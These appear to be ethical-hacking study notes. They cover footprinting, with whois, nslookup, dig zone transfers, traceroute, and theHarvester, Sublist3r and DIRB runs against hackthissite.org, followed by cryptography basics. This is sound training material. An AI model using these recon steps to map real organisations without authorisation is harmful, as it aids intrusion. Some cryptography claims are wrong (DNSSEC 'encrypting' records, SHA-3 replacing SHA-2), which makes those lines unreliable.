112 | - **Wayback Machine -> Google.com**: 113 | - ![wayback](https://searchengineland.com/figz/wp-content/seloads/2011/01/archive41-500x256.png) 114 | 115 | ### Email Footprinting 116 | 117 | - **Email header** - may show servers and where the location of those servers are 118 | - Email headers can provide: **Names, Addresses (IP, email), Mail servers, Time stamps, Authentication and so on.** 119 | - ![emailheader](https://www.wikihow.com/images/thumb/7/72/Read-Email-Headers-Step-7.jpg/v4-460px-Read-Email-Headers-Step-7.jpg.webp) 120 | - **EmailTrackerPro** is a Windows software that trace an email back to its true point of origin: 121 | - ![emailtrackerpro](http://www.emailtrackerpro.com/support/v9/tutorials/images/traceheader/3.png) 122 | - **Email tracking** - services can track various bits of information including the IP address of where it was opened, where it went, etc. 123 | 124 | ### DNS Footprinting 125 | 126 | - Ports 127 | 128 | - Name lookup - UDP 53 129 | - Zone transfer - TCP 53 130 | 131 | - Zone transfer replicates all records 132 | 133 | - **Name resolvers** answer requests 134 | 135 | - **Authoritative Servers** hold all records for a namespace 136 | 137 | - **DNS Record Types** 138 | 139 | - | Name | Description | Purpose | 140 | | ----- | ------------------ | ---------------------------------------------- | 141 | | SRV | Service | Points to a specific service | 142 | | SOA | Start of Authority | Indicates the authoritative NS for a namespace | 143 | | PTR | Pointer | Maps an IP to a hostname | 144 | | NS | Nameserver | Lists the nameservers for a namespace | 145 | | MX | Mail Exchange | Lists email servers | 146 | | CNAME | Canonical Name | Maps a name to an A reccord | 147 | | A | Address | Maps an hostname to an IP address | 148 | 149 | - **DNS Poisoning** - changes cache on a machine to redirect requests to a malicious server 150 | 151 | - **DNSSEC** - helps prevent DNS poisoning by encrypting records 152 | 153 | - **SOA Record Fields** 154 | 155 | - **Source Host** - hostname of the primary DNS 156 | - **Contact Email** - email for the person responsible for the zone file 157 | - **Serial Number** - revision number that increments with each change 158 | - **Refresh Time** - time in which an update should occur 159 | - **Retry Time** - time that a NS should wait on a failure 160 | - **Expire Time** - time in which a zone transfer is allowed to complete 161 | - **TTL** - minimum TTL for records within the zone 162 | 163 | - **IP Address Management** 164 | 165 | - **ARIN** - North America 166 | - **APNIC** - Asia Pacific 167 | - **RIPE** - Europe, Middle East 168 | - **LACNIC** - Latin America 169 | - **AfriNIC** - Africa 170 | 171 | - **Whois** - obtains registration information for the domain from command line or web interface. 172 | - on Kali, whois is pre-installed on CLI; e.g: `whois google.com`) 173 | - on Windows, you can use **SmartWhois** GUI software to perform a whois, or any website like domaintools.com 174 | - **Nslookup** - Performs DNS queries; (nslookup is pre-installed on Kali Linux) 175 | 176 | - `nslookup www.hackthissite.org` 177 | - ``` 178 | Server: 192.168.63.2 179 | Address: 192.168.63.2#53 180 | 181 | Non-authoritative answer: 182 | Name: www.hackthissite.org 183 | Address: 137.74.187.103 184 | Name: www.hackthissite.org 185 | Address: 137.74.187.102 186 | Name: www.hackthissite.org 187 | Address: 137.74.187.100 188 | Name: www.hackthissite.org 189 | Address: 137.74.187.101 190 | Name: www.hackthissite.org 191 | Address: 137.74.187.104 192 | ``` 193 | - First two lines shows my current DNS server; The IP addresses returned are '**A record**', meaning is the IPvA address of the domain; Bottom line NsLookup queries the specified DNS server and retrieves the requested records that are associated with the domain. 194 | 195 | - **The following types of DNS records are especially useful to use on Nslookup:** 196 | 197 | 198 | - | Type | Description | 199 | | ----- | ------------------ | 200 | | A | the IPv4 address of the domain | 201 | | AAAA | the domain’s IPv6 address | 202 | | CNAME | the canonical name — allowing one domain name to map on to another. This allows more than one website to refer to a single web server. | 203 | | MX | the server that handles email for the domain. | 204 | | NS | one or more authoritative name server records for the domain. | 205 | | TXT | a record containing information for use outside the DNS server. The content takes the form name=value. This information is used for many things including authentication schemes such as SPF and DKIM. | 206 | 207 | - **Nslookup - Interactive mode zone transfer** (Interactive mode allows the user to query name servers for information about various hosts and domains or to print a list of hosts in a domain). 208 | - `nslookup` 209 | - `server ` 210 | - `set type = ` 211 | - `` 212 | - ``` 213 | nslookup 214 | > set type=AAAA 215 | > www.hackthissite.org 216 | Server: 192.168.63.2 217 | Address: 192.168.63.2#53 218 | 219 | Non-authoritative answer: 220 | Name: www.hackthissite.org 221 | Address: 2001:41d0:8:ccd8:137:74:187:103 222 | Name: www.hackthissite.org 223 | Address: 2001:41d0:8:ccd8:137:74:187:102 224 | Name: www.hackthissite.org 225 | Address: 2001:41d0:8:ccd8:137:74:187:101 226 | Name: www.hackthissite.org 227 | Address: 2001:41d0:8:ccd8:137:74:187:100 228 | Name: www.hackthissite.org 229 | Address: 2001:41d0:8:ccd8:137:74:187:104 230 | ``` 231 | - **Dig** - unix-based command like nslookup 232 | 233 | - `dig ` 234 | - ``` 235 | dig www.hackthissite.org 236 | 237 | ; <<>> DiG 9.16.2-Debian <<>> www.hackthissite.org 238 | ;; global options: +cmd 239 | ;; Got answer: 240 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51391 241 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1 242 | 243 | ;; OPT PSEUDOSECTION: 244 | ; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096 245 | ;; QUESTION SECTION: 246 | ;www.hackthissite.org. IN A 247 | 248 | ;; ANSWER SECTION: 249 | www.hackthissite.org. 5 IN A 137.74.187.104 250 | www.hackthissite.org. 5 IN A 137.74.187.101 251 | www.hackthissite.org. 5 IN A 137.74.187.100 252 | www.hackthissite.org. 5 IN A 137.74.187.102 253 | www.hackthissite.org. 5 IN A 137.74.187.103 254 | 255 | ;; Query time: 11 msec 256 | ;; SERVER: 192.168.63.2#53(192.168.63.2) 257 | ;; WHEN: Tue Aug 11 15:05:01 EDT 2020 258 | ;; MSG SIZE rcvd: 129 259 | 260 | ``` 261 | - To get email records specify `-t MX` 262 | - `dig -t MX` 263 | - To get zone transfer specify `axfr` 264 | 265 | ### Network Footprinting 266 | 267 | - IP address range can be obtained from regional registrar (e.g: ARIN for America, RIPE for Europe, etc) 268 | 269 | - Use `traceroute` to find intermediary servers 270 | - traceroute uses ICMP echo in Windows (tracert) 271 | - traceroute is good for detect Firewalls and the network path 272 | 273 | **Usage example**: 274 | - **`traceroute -I nsa.gov`** 275 | - Specify target: `traceroute ` 276 | - In this case is used ICMP ECHO for tracerouting: `-I` 277 | ``` 278 | traceroute -I nsa.gov 279 | traceroute to nsa.gov (104.83.73.99), 30 hops max, 60 byte packets 280 | 1 192.168.63.2 (192.168.63.2) 0.194 ms 0.163 ms 0.150 ms 281 | 2 * * * 282 | 3 * * * 283 | 4 * * * 284 | 5 * * * 285 | 6 * * * 286 | 7 * * * 287 | 8 * * * 288 | 9 * * * 289 | 10 * * * 290 | 11 a104-83-73-99.deploy.static.akamaitechnologies.com (104.83.73.99) 42.742 ms 42.666 ms 25.176 ms 291 | 292 | ``` 293 | > ⚠️ **Windows command - `tracert`** 294 | > ⚠️ **Linux Command - `traceroute`** 295 | 296 | ## Other Relevant Tools 297 | 298 | ### **OSRFramework** 299 | 300 | > ⚡︎ **OSRFramework has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/4-OSRFramework.md)** 301 | 302 | 303 | Uses open source intelligence to get information about target. *(Username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction, and many others)*. 304 | 305 | ### **Web Spiders** 306 | Obtain information from the website such as pages, etc. 307 | 308 | ### **[Recon-ng](https://github.com/lanmaster53/recon-ng)** 309 | 310 | > ⚡︎ **Recon-ng has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/3-Recon-ng.md)** 311 | 312 | Recon-ng is a web-based open-source reconnaissance tool used to extract information from a target organization and its personnel. 313 | 314 | Provides a powerful environment in which open source web-based reconnaissance can be automated conducted, quickly and thoroughly. 315 | 316 | ### **[Metasploit Framework](https://github.com/rapid7/metasploit-framework)** 317 | 318 | > ⚡︎ **Metasploit has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/5-Metasploit-Basics.md)** 319 | 320 | The Metasploit Framework is a tool that provides information about security vulnerabilities and aids in penetration testing and IDS signature development; **This is a huge framework that provide Recon tools as well.** 321 | 322 | ### **[theHarvester](https://github.com/laramies/theHarvester)** 323 | 324 | > ⚡︎ **theHarvester has a [practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/6-theHarvester.md)** 325 | 326 | 327 | theHarvester is a OSINT tool; Useful for gathering information like: 328 | - Emails 329 | - Subdomains 330 | - Hosts 331 | - Employee names 332 | - Open ports 333 | - Banners from different public sources like search engines, PGP key servers and SHODAN computer database. 334 | 335 | **Usage example**: 336 | - **`theHarvester -d www.hackthissite.org -n -b google`** 337 | - Issue theHarvester command: `theHarvester` 338 | - Specify the domain: `-d ` 339 | - Perform dns lookup: `-n` 340 | - Specify search engine/source: `-b google` 341 | 342 | 343 | ``` 344 | theHarvester -d www.hackthissite.org -n -b google 345 | table results already exists 346 | 347 | ******************************************************************* 348 | * _ _ _ * 349 | * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * 350 | * | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * 351 | * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * 352 | * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * 353 | * * 354 | * theHarvester 3.1.0 * 355 | * Coded by Christian Martorella * 356 | * Edge-Security Research * 357 | * cmartorella@edge-security.com * 358 | * * 359 | ******************************************************************* 360 | 361 | 362 | [*] Target: www.hackthissite.org 363 | 364 | [*] Searching Google. 365 | Searching 0 results. 366 | Searching 100 results. 367 | Searching 200 results. 368 | Searching 300 results. 369 | Searching 400 results. 370 | Searching 500 results. 371 | 372 | [*] No IPs found. 373 | 374 | [*] Emails found: 2 375 | ---------------------- 376 | ab790c1315@www.hackthissite.org 377 | staff@hackthissite.org 378 | 379 | [*] Hosts found: 7 380 | --------------------- 381 | 0.loadbalancer.www.hackthissite.org: 382 | 22www.hackthissite.org: 383 | 2522www.hackthissite.org: 384 | 253dwww.hackthissite.org: 385 | www.hackthissite.org:137.74.187.104, 137.74.187.100, 137.74.187.101, 137.74.187.103, 137.74.187.102 386 | x22www.hackthissite.org: 387 | 388 | [*] Starting active queries. 389 | 137.74.187.100 390 | [*] Performing reverse lookup in 137.74.187.0/24 391 | module 'theHarvester.discovery.dnssearch' has no attribute 'DnsReverse' 392 | ``` 393 | 394 | ### **[Sublist3r](https://github.com/aboul3la/Sublist3r)** 395 | Sublist3r **enumerates subdomains** using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS 396 | 397 | **Usage example**: 398 | - **`python3 sublist3r.py -d hackthissite.org`** 399 | - Specify the domain: `-d ` 400 | ``` 401 | python3 sublist3r.py -d hackthissite.org 402 | 403 | ____ _ _ _ _ _____ 404 | / ___| _ _| |__ | (_)___| |_|___ / _ __ 405 | \___ \| | | | '_ \| | / __| __| |_ \| '__| 406 | ___) | |_| | |_) | | \__ \ |_ ___) | | 407 | |____/ \__,_|_.__/|_|_|___/\__|____/|_| 408 | 409 | # Coded By Ahmed Aboul-Ela - @aboul3la 410 | 411 | [-] Enumerating subdomains now for hackthissite.org 412 | [-] Searching now in Baidu.. 413 | [-] Searching now in Yahoo.. 414 | [-] Searching now in Google.. 415 | [-] Searching now in Bing.. 416 | [-] Searching now in Ask.. 417 | [-] Searching now in Netcraft.. 418 | [-] Searching now in DNSdumpster.. 419 | [-] Searching now in Virustotal.. 420 | [-] Searching now in ThreatCrowd.. 421 | [-] Searching now in SSL Certificates.. 422 | [-] Searching now in PassiveDNS.. 423 | [-] Total Unique Subdomains Found: 41 424 | www.hackthissite.org 425 | admin.hackthissite.org 426 | api.hackthissite.org 427 | ctf.hackthissite.org 428 | vm-005.outbound.firewall.hackthissite.org 429 | vm-050.outbound.firewall.hackthissite.org 430 | vm-099.outbound.firewall.hackthissite.org 431 | vm-150.outbound.firewall.hackthissite.org 432 | vm-200.outbound.firewall.hackthissite.org 433 | forum.hackthissite.org 434 | forums.hackthissite.org 435 | git.hackthissite.org 436 | irc.hackthissite.org 437 | (...) 438 | ``` 439 | 440 | ### [DIRB](https://tools.kali.org/web-applications/dirb) 441 | DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack/brute force attack against a web server and analyzing the response. 442 | - Useful to find subdirectories on web application 443 | 444 | **Usage example**: 445 | - **`dirb https://www.hackthissite.org/ /usr/share/wordlists/dirb/small.txt`** 446 | - Specify the url by issuing dirb command: `dib ` 447 | - Specify the wordlist: `/path/to/wordlist` 448 | 449 | ``` 450 | dirb https://www.hackthissite.org/ /usr/share/wordlists/dirb/small.txt 451 | 452 | ----------------- 453 | DIRB v2.22 454 | By The Dark Raver 455 | ----------------- 456 | 457 | URL_BASE: https://www.hackthissite.org/ 458 | WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt 459 | 460 | ----------------- 461 | 462 | GENERATED WORDS: 959 463 | 464 | ---- Scanning URL: https://www.hackthissite.org/ ---- 465 | + https://www.hackthissite.org/api (CODE:200|SIZE:10) 466 | + https://www.hackthissite.org/blog (CODE:200|SIZE:20981) 467 | + https://www.hackthissite.org/cgi-bin/ (CODE:403|SIZE:199) 468 | ``` 469 | 470 | ### Maltego 471 | 472 | > ⚡︎ **Maltego has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/1-Footprinting-and-Reconnaissance/2-Maltego-Basics.md)** 473 | 474 | Maltego is a powerful OSINT tool, you can extract a broad type of information through the network, technologies and personnel(email, phone number, twitter). 475 | 476 | - You able to: 477 | - Identify IP address 478 | - Identify Domain and Domain Name Schema 479 | - Identify Server Side Technology 480 | - Identify Service Oriented Architecture (SOA) information 481 | - Identify Name Server 482 | - Identify Mail Exchanger 483 | - Identify Geographical Location 484 | - Identify Entities 485 | - Discover Email addresses and Phone numbers 486 | 487 | ![alt text](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/6fe1dc406ed480aea2acfb2e9f34d51a0536e042/maltego-WebSite-IP-Location-WhoisOnDomain-5.png "IP Address, Location") 488 | 489 | 490 | ### Social Engineering Framework (SEF) 491 | It’s a open source Social Engineering Framework (SCRIPT) that helps generate phishing attacks and fake emails. and it’s includes phishing pages, fake email, fake email with file attachment and other stuff that helps you in Social Engineering Attack. 492 | 493 | ![sef](https://hacknews247.com/wp-content/uploads/2018/10/20181002_212155_533793.png) 494 | 495 | 496 | ## Web Based Recon 497 | 498 | ### **[NetCraft](https://www.netcraft.com/)** 499 | Netcraft is a website analyzing server, with the help of this website we find basic and important information on the website like: 500 | 501 | - **Background** — This includes basic domain information. 502 | - Which OS, Web server is runing; Which ISP; 503 | - **Network** — This includes information from IP Address to Domain names to nameservers. 504 | - **SSL/TLS** — This gives the ssl/tls status of the target 505 | - **Hosting History** - This gives the information on the hosting history of the target 506 | - **Sender Policy Framework (SPF)** — This describes who can send mail on the domains behalf 507 | - **DMARC** -This is a mechanism for domain owners to indicate how mail purporting to originate from their domain should be authenticated 508 | - **Web Trackers** — This trackers can be used to monitor individual user behavior across the web 509 | Site Technology — This section includes details on: 510 | - Cloud & PaaS 511 | - Server-Side technologies (e.g: PHP) 512 | - Client-Side technologies (e.g: JavaScript library) 513 | - CDN Information 514 | - CMS Information (e.g: Wordpress, Joomla, etc) 515 | - Mobile Technologies 516 | - Web stats (e.g: Web analytics, collection, etc) 517 | - Character encoding 518 | 519 | 520 | ![netcraft](https://i0.wp.com/hackingblogs.com/wp-content/uploads/2018/01/Capture-min-2.png) 521 | 522 | ### **[Shodan](https://www.shodan.io/)** 523 | *Shodan Unlike traditional search engines such as Google, use Web crawlers to traverse your entire site, but directly into the channel behind the Internet, various types of port equipment audits, and never stops looking for the Internet and all associated **servers, camera, printers, routers, and so on**.* 524 | 525 | - Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client. 526 | 527 | - Shodan works well with basic, single-term searches. Here are the basic search filters you can use: 528 | - **city:** find devices in a particular city 529 | - **country:** find devices in a particular country 530 | - **geo:** you can pass it coordinates 531 | - **hostname:** find values that match the hostname 532 | - **net:** search based on an IP or /x CIDR 533 | - **os:** search based on an operating system 534 | - **port:** find particular ports that are open 535 | - **before/after:** find results within a timeframe 536 | 537 | 538 | ![shodan](https://logz.io/wp-content/uploads/2019/05/Shodan.png) 539 | ![shodan2](https://securityonline.info/wp-content/uploads/2017/10/shodan-1-615x1024.png) 540 | 541 | ### **[Censys](https://censys.io/overview/)** 542 | *Alternative for Shodan.* 543 | 544 | ![censys](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/403be7a4514b6e0af36e0f568328372a5ce09cbf/censys.png) 545 | 546 | -------------------------------------------------------------------------------- /20-Cryptography.md: -------------------------------------------------------------------------------- 1 | # Cryptography 2 | 3 |

4 | 5 |

6 | 7 | ### The goals of Cryptography: 8 | - **C.I.A. + Nonrepudiation** 9 | - **Nonrepudiation** - Means by which a recipient can ensure the identity of the sender and neither party can deny sending. 10 | 11 | ## Basic Terms & Concepts 12 | 13 | - **Cryptography** 14 | - Science or study of protecting information whether in transit or at rest 15 | - Renders the information unusable to anyone who can't decrypt it 16 | - Takes plain text, applies cryptographic method, turn it into cipher text 17 | - **Cryptanalysis** 18 | - Study and methods used to crack cipher text 19 | - **Linear Cryptanalysis** 20 | - Works best on block ciphers 21 | - **Differential Cryptanalysis** 22 | - Applies to symmetric key algorithms 23 | - Compares differences in the inputs to how each one affects the outcome 24 | - **Integral cryptanalysis** 25 | - input vs output comparison same as differential; however, runs multiple computations of the same block size input 26 | - Plain text doesn't necessarily mean ASCII format - it simply means unencrypted data 27 | 28 | - **Key clustering** - Different encryption keys generate the same ciphertext from the same plaintext message 29 | 30 | ## Where to **Encrypt & Decrypt**? 31 | * **Data-in-Transit** / **Data-in motion**: Transport / Network 32 | - Not much protection as it travels 33 | - Many different switches, routers, devices 34 | - Network-based protection: 35 | - Firewall, IPS 36 | - Provide transport encryption: 37 | - TLS, IPsec 38 | * **Data-at-Rest**: Resides in storage 39 | - Hard drive, SSD, flash drive, etc 40 | - Encrypt the data 41 | - Whole disk encryption 42 | - Database encryption 43 | - File or/ folder-level encryption 44 | - Apply permissions 45 | - Access control lists 46 | - Only authorized users can access the data 47 | * **Data-in-use** / **Data-in-process**: RAM & CPU 48 | - The data is in memory or CPU registers and cache 49 | - The data is almost always decrypted 50 | ## Encryption Algorithms 51 | 52 | - **Algorithm** - step-by-step method of solving a problem 53 | - **Two General Forms of Cryptography** 54 | - **Substitution** - bits are replaced by other bits 55 | - **Transposition** - doesn't replace; simply changes order 56 | - **Encryption Algorithms** - mathematical formulas used to encrypt and decrypt data 57 | - **Steam Cipher** - readable bits are encrypted one at a time in a continuous stream 58 | - Usually done by an XOR operation 59 | - Work at a high rate of speed 60 | - **Block Cipher** - data bits are split up into blocks and fed into the cipher 61 | - Each block of data (usually 64 bits) encrypted with key and algorithm 62 | - Are simpler and slower than stream ciphers 63 | - **XOR** - exclusive or; if inputs are the same (0,0 or 1,1), function returns 0; if inputs are not the same (0,1 or 1,0), function returns 1 64 | - Key chosen for cipher must have a length larger than the data; if not, it is vulnerable to frequency attacks 65 | 66 | ## Symmetric Encryption 67 | 68 | - **Symmetric Encryption** - One Single Key / Session Key to encryption and decryption. 69 | > - **Known as:** 70 | > - Single key cryptography 71 | > - Secret key cryptography 72 | > - Shared key cryptography 73 | > - Session key cryptography 74 | 75 |

76 | 77 |

78 | 79 | **One key is used to encrypt and decrypt the data.** 80 | 81 | - Suitable for large amounts of data 82 | - 128-bit or larger symmetric keys are common 83 | - Harder for groups of people because more keys are needed as group increases 84 | - Can be very fast to use 85 | - Less overhead than asymmetric encryption 86 | - Often combined with asymmetric encryption 87 | 88 | - **Problems/Weaknesses of Symmetric Encryption:** 89 | - Problems include key distribution and management / not scalable 90 | - Non-repudiation possible because everyone has a copy of the key 91 | - Key must be regenerated whenever anyone leaves the group of keyholders 92 | 93 | ### Cryptosystem 94 | Defines key properties, communication requirements for the key exchange; actions through encryption and decryption process. 95 | 96 | *e.g.: Using asymetric encryption to exchange Session keys after that communicate using Symmetric encryption.* 97 | 98 | - **Key escrow** (also known as a “fair” cryptosystem) is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys. 99 | 100 | ### **Symmetric Cryptosystems:** 101 | 102 | Algorithm | Block or Streaming | Block Size | Rounds | Key Size | Notes 103 | --|--|--|--|--|-- 104 | **DES** | Block | 64-bit | 16 | 56 bits | Uses five modes of operation: ECB, CBC, CFB, OFB and CTR. 105 | **Blowfish** | Block | 64-bit | 16 | 32-448 bits | Public domain algorithm. 106 | **Twofish** | Block | 128-bit | 16 | 128, 192 and 256 bits | Public domain algorithm. 107 | **3DES** | Block | 64-bit | 16 | 168 bits (56 x 3) | Repeats DES process 3 times. 108 | **AES** | Block | 128-bit | 10, 12, or 14 | 128, 192 or 256 bits | Encryption standard for the US Gov.; Used in WPA2 109 | **RC4** | Streaming | N/A | 1 | 40-2048 bits | Used in WEP, SSL and TLS; largely deprecated in current;technologies. 110 | **IDEA** | Block | 64-bit | 8 | 128 bits | Made for replacement for the DES 111 | 112 | - Larger keys than symmetric encryption; Common to see key lengths of 3,072 bits or larger 113 | 114 | ## Asymmetric Encryption 115 | **Uses a Key pair:** 116 | > - **Public Key** - Anyone can see this key; give it away 117 | > - **Private Key** - Keep this private; used for decryption; The private key is used to digitally sign a message. 118 | 119 |

120 | 121 |

122 | 123 | - **Algorithms:** 124 | - **Diffie-Hellman** - Developed as a key exchange protocol; used in SSL and IPSec; if digital signatures are waived, vulnerable to MITM attacks 125 | - **Elliptic Curve Cryptosystem** (ECC) - Uses points on elliptical curve along with logarithmic problems; uses less processing power; good for mobile devices 126 | - **RSA** - Achieves strong encryption through the use of two large prime numbers; factoring these create key sizes up to 4096 bits; modern de facto standard 127 | - **El Gamal** - Not based on prime number factoring; uses solving of discrete logarithm problems 128 | 129 | - Only downside is it's slower than symmetric especially on bulk encryption and processing power 130 | 131 | 132 | ## Hashes 133 | 134 | - **One-way encryption** 135 | - **Verify the Integrity of the message.** 136 | - **Verify the authenticity of the message (proof of origin & non-repudiation)** 137 | - Impossible to recover the original message from the digest 138 | - Used to **store passwords** providing **confidentiality**. 139 | 140 | Hash | Algo. 141 | --|-- 142 | MD5 | 128 bit hash 143 | SHA-1 | 160 bit hash 144 | SHA256 | 256 bit hash 145 | 146 | *Examples*: 147 | ```console 148 | String: hello world! 149 | 150 | MD5 Hash: FC3FF98E8C6A0D3087D515C0473F8677 151 | SHA-1 Hash: 430CE34D020724ED75A196DFC2AD67C77772D169 152 | SHA256 Hash: 7509E5BDA0C762D2BAC7F90D758B5B2263FA01CCBC542AB5E3DF163BE08E6CA9 153 | ``` 154 | 155 | > ⚠️ If you change a single character, the entire Hash value changes. **See the example below, changing the last character '!' to '.'** 156 | 157 | * String: **hello world!** 158 | - ```MD5 Hash: FC3FF98E8C6A0D3087D515C0473F8677``` 159 | * String: **hello world.** 160 | - ```MD5 Hash: 3C4292AE95BE58E0C58E4E5511F09647``` 161 | 162 | ### **Message digest** 163 | A message digest or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message. If the two match, then integrity is assured. If they do not match, then the message was altered between transmission and receipt. 164 | 165 | > ⚠️ **Message digests are also called:** 166 | > - hashes 167 | > - hash values 168 | > - hash total 169 | > - CRC 170 | > - fingerprint 171 | > - checksum 172 | > - digital ID 173 | 174 | ## Hashing Algorithms 175 | ### MD5 - Message Digest Algorithm 176 | - First published in April 1992 177 | - Replaced MD4 178 | - 128-bit hash value 179 | - 1996: Vulnerabilities found 180 | - Not collision resistant 181 | 182 | > ⚠️ **Collision** - occurs when two or more files create the same output 183 | > - Can happen and can be used an attack; rare, though 184 | 185 | > ⚠️ **Key space** - Represents the total number of possible values of keys in a cryptographic algorithm or other security measure, such as password 186 | 187 | > ⚠️ **DUHK Attack** (Don't Use Hard-Coded Keys) - allows attackers to access keys in certain VPN implementations; affects devices using ANSI X9.31 with a hard-coded seed key 188 | 189 | > ⚠️ **Rainbow Tables** - contain precomputed hashes to try and find out passwords 190 | 191 | 192 | ### SHA - Secure Hash Algorithm 193 | - Developed by NSA 194 | #### SHA-1 195 | - Widely used 196 | - 160-bit digest 197 | - Weak; *2005: Collision attacks published* 198 | 199 | #### **SHA-2** Family 200 | - SHA-256 | minor version: SHA-224 201 | - SHA-512 | minor version: SHA-384 202 | 203 | #### **SHA-3** 204 | - Uses a hash function called Keccack and has the same length of SHA-2. 205 | - SHA-1 and SHA-2 have been replaced by the latest iteration of SHA known as SHA-3. 206 | 207 | ### **HMAC** 208 | Hash Message Authentication Code - Used in conjunction with symmetric key both to authenticate and verify integrity of the message. 209 | 210 | - Verify data **integrity** and **authenticity** 211 | - No fancy asymmetric encryption is required 212 | - Used in network encryption protocols 213 | - IPsec, TLS 214 | - Requires each side of the conversation to have the same key 215 | 216 | ### **RIPEMD** 217 | RACE Integrity Primitives Evaluation Message Digest. 218 | - Not very common 219 | - Open Standard 220 | - 128, 168, 256, 320 bit digests *(RIPEMD-128, RIPEMD-256, RIPEMD-320)* 221 | - *Original RIPEMD was found to have collision issues (2004)* 222 | - Effectively replaced with RIPEMD-160 (no known collision issues) 223 | - Based upon MD4 design but performs similar to SHA-1 224 | 225 | ## **Keystretching** 226 | Combine a very long salt and a huge number of hashing iterations to make cracking even more harder. (e.g Hashing the hashed password `N` times) 227 | 228 | **Two most popular Key stretching libraries/ functions:** 229 | * **PBKDF2** (Password-Based Key Derivation Function 2) algorithm 230 | - Part of RSA public key cryptography standards (PKCS #5, RFC 2898) 231 | * **bcrypt** 232 | - Generates hashes from passwords 233 | - An extension to the UNIX crypt library 234 | - Uses Blowfish cipher to perform multiple rounds of hashing 235 | 236 | *Example*: 237 | * **PBKDF2** 238 | ``` 239 | Password: 123456 240 | ``` 241 | 242 | ``` 243 | Hash: 244 | rYoSDg62evyzhE1+lWBa9A==:YaeMu71c8KU3H0RYFPle0Q== 245 | ``` 246 | 247 | * **bcrypt** 248 | ``` 249 | Password: 123456 250 | ``` 251 | 252 | ``` 253 | Hash: 254 | $2b$10$vES9mCPsE10//vOc1u01XeUVmJrZyHGMPaRfo39OIUoJ2g7iPtDnu 255 | ``` 256 | 257 | > ⚠️ **Key streaming** - involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output. 258 | 259 | ## Cryptographic nonce 260 | *Cryptographic randomization schemes* 261 | 262 | - Used once - 'for the nonce'/ for the time being 263 | - A random or pseudo-random number 264 | - Somehting that can't be reasonably guessed 265 | - Can also be a counter 266 | - Use a nonce during the login process 267 | - Server gives you a nonce 268 | - Calculate your password hash using the nonce 269 | - **Each password hash sent to the host will be different**, so a replay attack won't work 270 | 271 | ## Initialization vectors (IV) 272 | - Is a type of nonce 273 | - Used for randomizing an encryption scheme 274 | - The more random the better 275 | - Use in encryption ciphers, WEP, and older SSL implementations 276 | 277 |

278 | 279 |

280 | 281 | ## Digital Signatures 282 | 283 | - When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key 284 | - **Digital Signature Algorithm** (DSA) - used in generation and verification of digital signatures per FIPS 186-2 285 | 286 | > ⚠️ **Digital Signature Standard (DSS):** 287 | > - Document that NIST puts out to specify the digital signature algorithms & the encryption algorithms approved for use by the US gov. 288 | 289 | 290 | ## PKI System 291 | ***Public Key Infrastructure** (PKI) - structure designed to verify and authenticate the identity of individuals* 292 | 293 |

294 | 295 |

296 | 297 | - Also refers to the binding of public keys to people or devices 298 | - The certificate authority (CA) 299 | - It's all about trust 300 | 301 | - **X.509 v3** is current format most widely used. Part of the X.500 family of standards 302 | 303 | ### **Digital Certificates** 304 | 305 | - **Certificate** - electronic file that is used to verify a user's identity; provides nonrepudiation 306 | 307 | - **X.509** - standard used for digital certificates 308 | 309 | - **Contents of a Digital Certificate:** 310 | - ![digi-cert](https://sites.google.com/site/amitsciscozone/_/rsrc/1468881655481/home/security/digital-certificates-explained/Digital%20Certificate%20Format.PNG) 311 | - **Version** - identifies certificate format 312 | - **Serial Number** - used to uniquely identify certificate 313 | - **Subject** - who or what is being identified 314 | - **Algorithm ID** (Signature Algorithm) - shows the algorithm that was used to create the certificate 315 | - **Issuer** - shows the entity that verifies authenticity 316 | - **Valid From and Valid To** - dates certificate is good for 317 | - **Key Usage** - what purpose the certificate serves 318 | - **Subject's Public Key** - copy of the subject's public key 319 | - **Optional Fields** - Issuer Unique Identifier, Subject Alternative Name, and Extensions 320 | 321 | - Some root CAs are automatically added to OSes that they already trust; normally are reputable companies 322 | 323 | - **Self-Signed Certificates** - certificates that are not signed by a CA; generally not used for public; used for development purposes 324 | - Signed by the same entity it certifies 325 | 326 | 327 | **Registration Authority** 328 | - Verifies user identity 329 | 330 | **Certificate Authority** 331 | - Third party to the organization; creates and issues digital certificates 332 | 333 | **Certificate Revocation List (CRL)** 334 | - Used to track which certificates have problems and which have been revoked 335 | 336 | **Validation Authority** 337 | - Used to validate certificates via Online Certificate Status Protocol (OCSP) 338 | 339 | **Trust Model** 340 | - How entities within an enterprise deal with keys, signatures and certificates 341 | 342 | **Cross-Certification** 343 | - Allows a CA to trust another CS in a completely different PKI; allows both CAs to validate certificates from either side 344 | 345 | **Single-authority system** 346 | - CA at the top 347 | 348 | **Hierarchical trust system** 349 | - CA at the top (root CA); makes use of one or more RAs (subordinate CAs) underneath it 